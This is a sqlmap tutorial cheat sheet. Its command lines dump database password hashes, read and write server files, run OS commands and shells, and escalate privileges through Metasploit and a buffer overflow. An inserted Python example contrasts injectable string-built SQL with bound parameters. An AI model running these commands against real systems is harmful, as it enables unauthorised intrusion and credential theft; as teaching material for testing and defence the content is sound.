
sqlmap

Resources

demo 1 :

Extensively fingerprint the back-end database management system; enumerate the banner, session user, current database, users, users' password hashes, and databases

sqlmap -u "http://192.168.43.7/index.php?id=1" -f -b --current-user --current-db --users --passwords --dbs -v 0
  • -u : target url
  • -f : extensively fingerprint the back-end DBMS
  • -b : retrieve DBMS banner
  • --current-user : retrieve session user
  • --current-db : retrieve current database
  • --users : enumerate database users
  • --passwords : enumerate database users' password hashes
  • --dbs : enumerate available databases
  • -v : output verbosity level (0, warning)

demo 2 :

Retrieve the database management system banner and enumerate the password hashes for the database session user via UNION query SQL injection

sqlmap -u "" -b --passwords -U CU --union-use -v 2
  • -U : specify the database user (CU, alias for current user)
  • --union-use : retrieve data via UNION query SQL injection, if possible

demo 3 :

Dump only from the second to the third entry of column surname of table users

sqlmap -u "" --dump -T users -C surname -D testdb --start 2 --stop 3 -v 2
  • --dump : dump table entries
  • -T : table to dump
  • -C : columns to dump
  • --start : first entry to dump
  • --stop : last entry to dump
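
Why the UNION technique in demo 2 can return rows such as the surname column of the users table from demo 3, and the query-side fix. This is an added example, not from the original page or the sqlmap project; the articles table, the function names and the sample rows are assumptions, and SQLite stands in for the back-end DBMS.

```python
import sqlite3

def make_db():
    """Constructed sample data: an 'articles' table the page is meant to
    serve, and a 'users' table (with a 'surname' column) it is not."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, surname TEXT);
        INSERT INTO articles VALUES (1, 'welcome');
        INSERT INTO users VALUES (1, 'alvarez'), (2, 'baker'), (3, 'chen');
    """)
    return db

def lookup_concat(db, raw_id):
    # Weak: the request value becomes part of the SQL text, so any SQL
    # it carries is parsed and executed together with the query.
    sql = "SELECT title FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_bound(db, raw_id):
    # Hardened: the value must parse as an integer and is then bound as a
    # parameter, so it is only ever data and never SQL text.
    try:
        sql = "SELECT title FROM articles WHERE id = ?"
        return db.execute(sql, (int(raw_id),)).fetchall()
    except (ValueError, OverflowError):
        return []  # non-numeric or out-of-range id: no rows

def demo():
    db = make_db()
    # Constructed value for the 'id' parameter, appending a second SELECT.
    crafted = "0 UNION SELECT surname FROM users"
    return {
        "normal_concat": lookup_concat(db, "1"),
        "normal_bound": lookup_bound(db, "1"),
        "crafted_concat": lookup_concat(db, crafted),
        "crafted_bound": lookup_bound(db, crafted),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```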

demo 4 :

Enumerate and dump entries from all databases' tables, limited to tables that contain one or more of the columns specified by the user

sqlmap -u "" --dump -C 'user,pass' -v 1 --exclude-sysdbs
  • --exclude-sysdbs : ignore system databases

demo 5 :

Interactive SQL shell

sqlmap -u "" --sql-shell -v 2
  • --sql-shell : spawn an interactive SQL shell

demo 6 :

sqlmap reads a file from the underlying file system and stores it locally

sqlmap -u "" --read-file "C:\example.txt" -v 2
  • --read-file : file to read from the underlying file system

demo 7 :

sqlmap uploads a file from the local file system to the database server's underlying file system and checks afterward for consistency

sqlmap -u "" --write-file /etc/passwd --dest-file /tmp/writetest -v 2
  • --write-file : file to upload to the underlying file system (/etc/passwd)
  • --dest-file : absolute file system path to write to (/tmp/writetest)

demo 8 :

Operating system command execution via user-defined function injection

sqlmap -u "" --os-cmd "id" -v 1
  • --os-cmd : operating system command to execute (id)

demo 9 :

Interactive shell where the user can execute operating system commands via user-defined function injection

sqlmap -u "" --os-shell -v 1 --union-use
  • --os-shell : spawn an interactive command prompt

demo 10 :

sqlmap -u "" --os-pwn --msf-path /home/unquis/software/metasploit --priv-esc -v 1
  • --os-pwn : establish an out-of-band connection between the user and the database server
  • --msf-path : metasploit file system path
  • --priv-esc : try to elevate the database process user privileges to SYSTEM

demo 11 :

sqlmap -u "" --os-bof -v 1 --msf-path ~/software/metasploit
  • --os-bof : establish an out-of-band connection between the user and the database server by exploiting a Microsoft SQL Server buffer overflow